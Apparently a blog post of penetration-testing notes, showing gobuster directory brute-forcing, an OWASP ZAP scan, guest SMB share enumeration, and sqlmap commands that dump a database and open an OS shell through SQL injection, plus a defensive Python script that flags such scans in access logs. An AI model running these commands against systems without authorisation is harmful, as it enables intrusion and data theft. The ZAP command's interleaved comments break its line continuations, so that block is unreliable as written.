Finding things
Tools
Gobuster
First, get some wordlists. I've been lazy and have been using the wordlists package in Kali.
# -u: the target URL and port
# -w: a big wordlist
# -x: also try each word with .pdf and .txt appended (the bare word is requested too)
gobuster dir \
  -u http://domain-name-here:8000 \
  -w /usr/share/wordlists/dirb/big.txt \
  -x pdf,txt
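From the other side of the wire, a scan like the one above shows up in the web server's access log as one client requesting many distinct paths and getting mostly 404s. The following is an added defender-side example, not code from the original post: it parses constructed combined-format log lines (the addresses, timestamps, user agents and thresholds are all assumptions) and flags clients whose traffic fits that pattern.

```python
import re
from collections import defaultdict

# Constructed sample lines in combined log format: 10.0.0.5 behaves like a
# wordlist scan with -x pdf,txt (many distinct paths, mostly 404s);
# 192.0.2.10 is ordinary browsing. Assumed data, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /admin.pdf HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /admin.txt HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /backup.pdf HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /backup.txt HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.txt HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /docs.pdf HTTP/1.1" 200 5120 "-" "gobuster/3.6"
192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2024:10:00:04 +0000] "GET /docs.pdf HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /missing HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def parse(log_text):
    """Yield (ip, path, status, user_agent) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m["ip"], m["path"], int(m["status"]), m["ua"]

def find_bruteforcers(log_text, min_requests=5, min_404_ratio=0.6):
    """Return {ip: stats} for clients that look like a wordlist scan.
    The thresholds are illustrative assumptions, tune them per site."""
    per_ip = defaultdict(lambda: {"total": 0, "nf": 0, "paths": set(), "uas": set()})
    for ip, path, status, ua in parse(log_text):
        s = per_ip[ip]
        s["total"] += 1
        s["paths"].add(path)
        s["uas"].add(ua)
        if status == 404:
            s["nf"] += 1
    flagged = {}
    for ip, s in per_ip.items():
        ratio = s["nf"] / s["total"]
        if s["total"] >= min_requests and ratio >= min_404_ratio:
            flagged[ip] = {"requests": s["total"], "ratio_404": round(ratio, 2),
                           "distinct_paths": len(s["paths"]), "user_agents": sorted(s["uas"])}
    return flagged
```

The user agent is reported for context only; a scanner's default string is trivial to change, so the volume and 404 ratio carry the signal.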
OWASP ZAP
Run an OWASP ZAP full scan in a Docker container, then write the results to testreport.html.
# mount the current directory as /zap/wrk so the report is written back here
docker run --rm -v "$(pwd)":/zap/wrk/:rw \
  -t ghcr.io/zaproxy/zaproxy:stable zap-full-scan.py \
  -t http://TARGET-NAME:PORT \
  # -g writes a generated rule config file you can edit for later runs
  -g gen.conf \
  # -r writes the HTML report
  -r testreport.html
smb
Once you see tcp/445 open, take a look around.
# list shares as guest
netexec smb [hostname/ip] -u guest -p '' --shares
# connect to a share as guest
smbclient //hostname/sharename -U guest%
sqlmap
# dump the database (quote the URL so the shell does not interpret ? or &)
sqlmap -u "http://192.168.50.19/blindsqli.php?user=1" -p user --dump
# -T <table> if you know the table you're interested in
# --threads <n> to speed it up
# -r reads a saved POST request (intercept it with Burp and save it to a file)
# --os-shell
# --web-root is a directory the web server can write to
sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"
This post is licensed under CC BY 4.0 by the author.